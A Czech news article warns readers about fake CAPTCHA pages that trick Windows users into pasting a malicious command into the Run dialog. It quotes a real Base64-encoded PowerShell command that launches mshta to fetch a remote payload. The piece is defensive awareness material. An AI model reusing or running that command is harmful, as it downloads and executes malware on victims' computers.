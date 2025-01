Captcha se vyvíjí, aby ji nemohli jednoduše překonat roboti. Od prostého opisování textů jsme se dostali do bodu, kdy přetahujeme posuvníky, skládáme puzzle nebo otáčíme objekty. Pokud vás ale Captcha vybízí ke zmáčknutí Win+R a vložení kódu, zpozorněte.

Falešná Captcha distribuuje malware, jak upozornil bezpečnostní lektor David Kudrna. Na rozmach podvodného testu v lednu upozornilo také IT oddělení Ohio State University, řešil se rovněž na Redditu nebo fórech Malwarebytes.

Podívejme se na příklad podvodné Captchy. Napodobuje vizuální styl Googlu, aby vás zmátla. Abyste ověřili, že nejste robot, chce po vás, abyste provedli čtyři kroky:

Zmáčkněte a podržte klávesy Win+R. V ověřovacím okně zmáčkněte Ctrl+V. Stiskněte Enter na klávesnici. Klepněte na tlačítko Ověřit.



Falešná Captcha nese velice nestandardní instrukce

Pokud se neřadíte k počítačovým začátečníkům a začátečnicím, jistě vás napadne, že pravá Captcha z principu nemůže vyžadovat tolik manuálních akcí a už vůbec nemůže vyžadovat práci s externím programem.

TLDR Falešná Captcha vám zkopíruje do schránky skript vedoucí ke stažení malwaru. Navede vás k otevření dialogu Spustit, vložíte do něj skript a voila, váš počítač je během několika okamžiků infikovaný škodlivým kódem.

Ono údajné ověřovací okno je dialog Spustit, letitá komponenta Windows, jehož prostřednictvím se spouští programy nebo otevírají složky v počítači. Je flexibilní. Když do něj vložíte webovou adresu, otevře ji ve výchozím prohlížeči. Program spustíte i s parametrem. V případě příkazového řádku PowerShell takto spustíte skript. Této vlastnosti podvodník využívá.

Dále jistě víte, že klávesová zkratka Ctrl+V vkládá obsah ze schránky. Co byste ale měli vložit do dialogu Spustit, když jste zrovna do schránky nic nezkopírovali? Samozřejmě vám do schránky něco zkopírovala webová stránka s falešnou Captchou. V pár měsíců starém případu na Redditu to bylo následující:

powershell.exe -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYwBsAGkAYwBrAHQAbwBnAG8ALgBjAGwAaQBjAGsALwBkAG8AdwBuAGwAbwBhAGQAcwAvAHQAcgAwADgAIgA=

Jde o povel, v němž se nachází řetězec znaků zakódovaných do formátu Base64. Dekódovací nástroje existují, např. ten na adrese www.base64decode.org. Po rozkódování máme jasno.



Zakódovaný řetězec nese na první pohled podezřelou adresu

Ono -eC říká PowerShellu, aby spustil zakódovaný skript. Ten zase nastartuje program mshta.exe. Je opět letitá komponenta Windows a slouží k provozování HTML aplikací (HTA, tj. Microsoft HTML Application). Nespouští jen soubory HTA, útočící subjekt může mshta.exe zneužít i ke spouštění skriptů.

V tomto případě by tedy mshta.exe stáhlo cokoli z vložené adresy, která je dnes již neaktivní. Pravděpodobně by šlo o malware. Adresa je na první pohled podezřelá. Což nezjistíte, dokud řetězec vložený do schránky nedekódujete. Samotný zakódovaný řetězec důvěru rovněž nevyvolává.

Zranitelní jsou zejména ti, kteří nepracují s počítačem na hlubší úrovni. Jak uvádí Ohio State University, falešná Captcha se někdy nachází i na legitimních webech. Typicky prostřednictvím reklamního systému.

Captcha je uživatelsky otravná, každoročně její řešení stojí lidstvo mnoho času. Podle nedávné studie dokonce ani nefunguje. Zaujala nás verifikace, během níž zabijete tři monstra v Doomu. To je pochopitelně spíše anekdotická záležitost. Reálný způsob, jak eliminovat Captchu, vymysleli Apple nebo Google. Ověřování lidství je s námi i tak dodnes.

Známý podezřelý Bylo mnohokrát prokázáno, že program mshta.exe je zneužíván jako prostředník k malwarovým útokům. Popisují to třeba Mitre Corporation, Domiziana Foti z Infosecu, McAfee nebo Red Canary. Bezpečnostní firma CyberOne ukazuje, jak se dá mshta.exe zneužít k získání přístup k PowerShellu.

Zdroje: David Kudrna #cyber #AI 🚀 / X | OTDI / The Ohio State University | soko90909 / Reddit | McAfee | Medium | Mitre Corporation | McAfee | Red Canary | CyberOne | Malwarebytes Forums